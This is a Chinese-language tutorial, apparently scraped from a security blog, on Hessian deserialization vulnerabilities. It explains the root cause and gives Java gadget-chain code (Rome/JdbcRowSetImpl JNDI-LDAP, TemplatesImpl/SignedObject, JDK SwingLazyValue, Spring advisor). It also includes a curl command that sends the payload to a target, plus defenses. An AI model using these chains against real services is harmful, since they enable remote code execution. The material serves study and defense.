Hessian反序列化漏洞原理与武器化利用<\/h1>

0x01 Hessian简介<\/h2>
Hessian是由Caucho公司开发的一种轻量级二进制RPC协议，它定义了自己的序列化规则和通信机制。在实际应用中，Hessian通常通过HTTP传输，相比传统的XML\/JSON等文本协议，传输效率更高。<\/p>
Hessian协议有两个主要版本：<\/p>
Hessian 1.0：初始版本<\/li>
Hessian 2.0：升级版本，优化了序列化效率，性能显著提升<\/li> <\/ul>
0x02 Hessian基本使用<\/h2>

2.1 自封装调用<\/h3>
依赖配置<\/strong>：<\/p>
<dependency><\/span>
<\/span><\/span>    <groupId><\/span>com.caucho<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>hessian<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>4.0.60<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>实体类示例<\/strong>：<\/p>
public<\/span> class<\/span> Person<\/span> implements<\/span> Serializable {<\/span>
<\/span><\/span>    private<\/span> String name;<\/span>
<\/span><\/span>    private<\/span> int<\/span> age;<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 构造方法、getter\/setter省略
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>序列化与反序列化<\/strong>：<\/p>
\/\/ Hessian 1.0
<\/span><\/span><\/span><\/span>HessianOutput hessianOutput =<\/span> new<\/span> HessianOutput(<\/span>byteArrayOutputStream);<\/span>
<\/span><\/span>hessianOutput.<\/span>writeObject<\/span>(<\/span>person);<\/span>
<\/span><\/span>
<\/span><\/span>HessianInput hessianInput =<\/span> new<\/span> HessianInput(<\/span>byteArrayInputStream);<\/span>
<\/span><\/span>Person deserializedPerson =<\/span> (<\/span>Person)<\/span> hessianInput.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ Hessian 2.0
<\/span><\/span><\/span><\/span>Hessian2Output hessianOutput =<\/span> new<\/span> Hessian2Output(<\/span>byteArrayOutputStream);<\/span>
<\/span><\/span>Hessian2Input hessianInput =<\/span> new<\/span> Hessian2Input(<\/span>byteArrayInputStream);<\/span>
<\/span><\/span><\/code><\/pre>2.2 Servlet集成Hessian<\/h3>
服务端实现<\/strong>：<\/p>
@WebServlet<\/span>(<\/span>name =<\/span> "hessian"<\/span>,<\/span> value =<\/span> "\/hessian"<\/span>)<\/span>
<\/span><\/span>public<\/span> class<\/span> ServiceImpl<\/span> extends<\/span> HessianServlet implements<\/span> Service {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> String getCurrentTime<\/span>()<\/span> {<\/span>
<\/span><\/span>        return<\/span> "当前时间: "<\/span> +<\/span> LocalDateTime.<\/span>now<\/span>().<\/span>format<\/span>(<\/span>DateTimeFormatter.<\/span>ISO_LOCAL_DATE_TIME<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>客户端调用<\/strong>：<\/p>
HessianProxyFactory factory =<\/span> new<\/span> HessianProxyFactory();<\/span>
<\/span><\/span>Service service =<\/span> (<\/span>Service)<\/span> factory.<\/span>create<\/span>(<\/span>Service.<\/span>class<\/span>,<\/span> "http:\/\/localhost:8080\/hessian"<\/span>);<\/span>
<\/span><\/span>System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>service.<\/span>getCurrentTime<\/span>());<\/span>
<\/span><\/span><\/code><\/pre>2.3 Spring集成Hessian<\/h3>
服务接口<\/strong>：<\/p>
public<\/span> interface<\/span> HelloHessianService<\/span> {<\/span>
<\/span><\/span>    String hello<\/span>(<\/span>String name);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>服务实现<\/strong>：<\/p>
@Service<\/span>
<\/span><\/span>public<\/span> class<\/span> HelloHessianServiceImpl<\/span> implements<\/span> HelloHessianService {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> String hello<\/span>(<\/span>String name)<\/span> {<\/span>
<\/span><\/span>        return<\/span> "Hello Hessian "<\/span> +<\/span> name;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>服务暴露配置<\/strong>：<\/p>
@Bean<\/span>(<\/span>name =<\/span> "\/hessian\/helloService"<\/span>)<\/span>
<\/span><\/span>public<\/span> HessianServiceExporter hessianServiceExporter<\/span>()<\/span> {<\/span>
<\/span><\/span>    HessianServiceExporter exporter =<\/span> new<\/span> HessianServiceExporter();<\/span>
<\/span><\/span>    exporter.<\/span>setService<\/span>(<\/span>helloHessianService);<\/span>
<\/span><\/span>    exporter.<\/span>setServiceInterface<\/span>(<\/span>HelloHessianService.<\/span>class<\/span>);<\/span>
<\/span><\/span>    return<\/span> exporter;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>0x03 Hessian反序列化漏洞原理分析<\/h2>
3.1 漏洞成因<\/h3>
Hessian反序列化漏洞的核心在于：<\/p>

Hessian在反序列化Map类型数据时，会调用HashMap的put方法<\/li>
put方法内部会调用hashCode\/equals方法<\/li>
如果攻击者构造的恶意类重写了这些方法，就会在反序列化时触发恶意代码<\/li>
<\/ul>
3.2 调用栈分析<\/h3>

HessianInput#readObject<\/code> 根据输入流的第一个字节判断对象类型<\/li>
对于Map类型（标记字节为'M'），进入readMap<\/code>方法<\/li>
readMap<\/code>方法尝试获取对应类型的反序列化器<\/li>
如果找不到反序列化器，会创建默认的MapDeserializer<\/code><\/li>
最终通过map.put(key, value)<\/code>设置键值对<\/li>
<\/ol>
关键点：<\/p>

Hessian 1.0将所有对象作为Map读取<\/li>
Hessian 2.0使用UnsafeDeserializer<\/code>处理自定义类型<\/li>
利用链的起始方法只能是hashCode\/equals\/compareTo<\/code><\/li>
<\/ul>
0x04 典型利用链<\/h2>
4.1 Rome + JdbcRowSetImpl（需要出网）<\/h3>
依赖<\/strong>：<\/p>
<dependency><\/span>
<\/span><\/span>    <groupId><\/span>rome<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>rome<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>1.0<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>利用代码<\/strong>：<\/p>
String url =<\/span> "ldap:\/\/127.0.0.1:1389\/exploit"<\/span>;<\/span>
<\/span><\/span>JdbcRowSetImpl jdbcRowSet =<\/span> new<\/span> JdbcRowSetImpl();<\/span>
<\/span><\/span>jdbcRowSet.<\/span>setDataSourceName<\/span>(<\/span>url);<\/span>
<\/span><\/span>
<\/span><\/span>ToStringBean toStringBean =<\/span> new<\/span> ToStringBean(<\/span>JdbcRowSetImpl.<\/span>class<\/span>,<\/span> jdbcRowSet);<\/span>
<\/span><\/span>EqualsBean equalsBean =<\/span> new<\/span> EqualsBean(<\/span>ToStringBean.<\/span>class<\/span>,<\/span> toStringBean);<\/span>
<\/span><\/span>
<\/span><\/span>HashMap hashMap =<\/span> MapUtils.<\/span>makeMap<\/span>(<\/span>equalsBean,<\/span> "1"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化与反序列化...
<\/span><\/span><\/span><\/code><\/pre>4.2 TemplatesImpl + SignedObject（不出网）<\/h3>
利用代码<\/strong>：<\/p>
\/\/ 创建恶意TemplatesImpl
<\/span><\/span><\/span><\/span>TemplatesImpl obj =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>MapUtils.<\/span>setValue<\/span>(<\/span>obj,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>evilCode});<\/span>
<\/span><\/span>MapUtils.<\/span>setValue<\/span>(<\/span>obj,<\/span> "_name"<\/span>,<\/span> "xxx"<\/span>);<\/span>
<\/span><\/span>MapUtils.<\/span>setValue<\/span>(<\/span>obj,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 使用SignedObject包装
<\/span><\/span><\/span><\/span>ToStringBean bean =<\/span> new<\/span> ToStringBean(<\/span>Templates.<\/span>class<\/span>,<\/span> obj);<\/span>
<\/span><\/span>EqualsBean equalsBean =<\/span> new<\/span> EqualsBean(<\/span>ToStringBean.<\/span>class<\/span>,<\/span> bean);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 密钥准备
<\/span><\/span><\/span><\/span>KeyPairGenerator keyPairGenerator =<\/span> KeyPairGenerator.<\/span>getInstance<\/span>(<\/span>"DSA"<\/span>);<\/span>
<\/span><\/span>keyPairGenerator.<\/span>initialize<\/span>(<\/span>1024<\/span>);<\/span>
<\/span><\/span>KeyPair keyPair =<\/span> keyPairGenerator.<\/span>genKeyPair<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建SignedObject
<\/span><\/span><\/span><\/span>SignedObject signedObject =<\/span> new<\/span> SignedObject(<\/span>hashMap,<\/span> keyPair.<\/span>getPrivate<\/span>(),<\/span> Signature.<\/span>getInstance<\/span>(<\/span>"DSA"<\/span>));<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 二次包装
<\/span><\/span><\/span><\/span>ToStringBean toStringBean1 =<\/span> new<\/span> ToStringBean(<\/span>SignedObject.<\/span>class<\/span>,<\/span> signedObject);<\/span>
<\/span><\/span>EqualsBean equalsBean2 =<\/span> new<\/span> EqualsBean(<\/span>ToStringBean.<\/span>class<\/span>,<\/span> toStringBean1);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化与反序列化...
<\/span><\/span><\/span><\/code><\/pre>4.3 JDK原生利用链（不出网，无依赖）<\/h3>
利用代码<\/strong>：<\/p>
\/\/ 使用Unsafe动态加载恶意类
<\/span><\/span><\/span><\/span>Method invoke =<\/span> MethodUtil.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"invoke"<\/span>,<\/span> Method.<\/span>class<\/span>,<\/span> Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>);<\/span>
<\/span><\/span>Method defineClass =<\/span> Unsafe.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"defineClass"<\/span>,<\/span> String.<\/span>class<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>,<\/span> 
<\/span><\/span>    int<\/span>.<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>,<\/span> ClassLoader.<\/span>class<\/span>,<\/span> ProtectionDomain.<\/span>class<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造SwingLazyValue链
<\/span><\/span><\/span><\/span>SwingLazyValue swingLazyValue =<\/span> new<\/span> SwingLazyValue(<\/span>"sun.reflect.misc.MethodUtil"<\/span>,<\/span> "invoke"<\/span>,<\/span> 
<\/span><\/span>    new<\/span> Object[]{<\/span>invoke,<\/span> unsafe,<\/span> new<\/span> Object[]{<\/span>className,<\/span> bytecode,<\/span> 0<\/span>,<\/span> bytecode.<\/span>length<\/span>,<\/span> null<\/span>,<\/span> null<\/span>}});<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造UIDefaults触发
<\/span><\/span><\/span><\/span>UIDefaults uiDefaults =<\/span> new<\/span> UIDefaults(<\/span>new<\/span> Object[]{<\/span>"key"<\/span>,<\/span> swingLazyValue});<\/span>
<\/span><\/span>Hashtable<<\/span>Object,<\/span> Object><\/span> hashtable =<\/span> new<\/span> Hashtable<>();<\/span>
<\/span><\/span>hashtable.<\/span>put<\/span>(<\/span>"a"<\/span>,<\/span> uiDefaults);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化与反序列化...
<\/span><\/span><\/span><\/code><\/pre>4.4 Spring AbstractBeanFactoryPointcutAdvisor<\/h3>
依赖<\/strong>：<\/p>
<dependency><\/span>
<\/span><\/span>    <groupId><\/span>org.springframework<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>spring-aop<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>5.0.0.RELEASE<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>利用代码<\/strong>：<\/p>
SimpleJndiBeanFactory beanFactory =<\/span> new<\/span> SimpleJndiBeanFactory();<\/span>
<\/span><\/span>beanFactory.<\/span>setShareableResources<\/span>(<\/span>"ldap:\/\/127.0.0.1:1389\/exploit"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>DefaultBeanFactoryPointcutAdvisor advisor1 =<\/span> new<\/span> DefaultBeanFactoryPointcutAdvisor();<\/span>
<\/span><\/span>advisor1.<\/span>setAdviceBeanName<\/span>(<\/span>"ldap:\/\/127.0.0.1:1389\/exploit"<\/span>);<\/span>
<\/span><\/span>advisor1.<\/span>setBeanFactory<\/span>(<\/span>beanFactory);<\/span>
<\/span><\/span>
<\/span><\/span>HotSwappableTargetSource targetSource1 =<\/span> new<\/span> HotSwappableTargetSource(<\/span>advisor1);<\/span>
<\/span><\/span>HashMap hashMap =<\/span> MapUtils.<\/span>makeMap<\/span>(<\/span>targetSource1,<\/span> "1"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化与反序列化...
<\/span><\/span><\/span><\/code><\/pre>0x05 工具自动化<\/h2>
在实际漏洞利用中，可以封装工具实现自动化：<\/p>

支持多种利用链（Rome、XBean、Resin、Spring等）<\/li>
输出格式支持：

Base64编码<\/li>
Hex编码<\/li>
序列化文件导出<\/li>
<\/ul>
<\/li>
HTTP请求发送功能<\/li>
<\/ol>
示例curl命令<\/strong>：<\/p>
curl -XPOST --data-binary @hessian.ser http:\/\/target\/api -H "Content-Type:x-application\/hessian"<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

升级Hessian到最新版本<\/li>
实现自定义的SerializerFactory<\/code>，限制反序列化的类<\/li>
使用白名单机制控制可反序列化的类<\/li>
网络层面限制敏感端口的出站连接<\/li>
<\/ol>
参考资源<\/h2>

Hessian反序列化原生JDK利用链分析<\/a><\/li>
Hessian反序列化漏洞深入分析<\/a><\/li>
Hessian反序列化漏洞利用实践<\/a><\/li>
Hessian反序列化内存马注入<\/a><\/li>
<\/ol>
Hessian反序列化漏洞原理与武器化利用<\/h1>

0x02 Hessian基本使用<\/h2>

0x03 Hessian反序列化漏洞原理分析<\/h2>

0x04 典型利用链<\/h2>

参考资源<\/h2> Hessian反序列化原生JDK利用链分析<\/a><\/li> Hessian反序列化漏洞深入分析<\/a><\/li> Hessian反序列化漏洞利用实践<\/a><\/li> Hessian反序列化内存马注入<\/a><\/li> <\/ol>

参考资源<\/h2>

Hessian反序列化原生JDK利用链分析<\/a><\/li>
Hessian反序列化漏洞深入分析<\/a><\/li>
Hessian反序列化漏洞利用实践<\/a><\/li>
Hessian反序列化内存马注入<\/a><\/li> <\/ol>
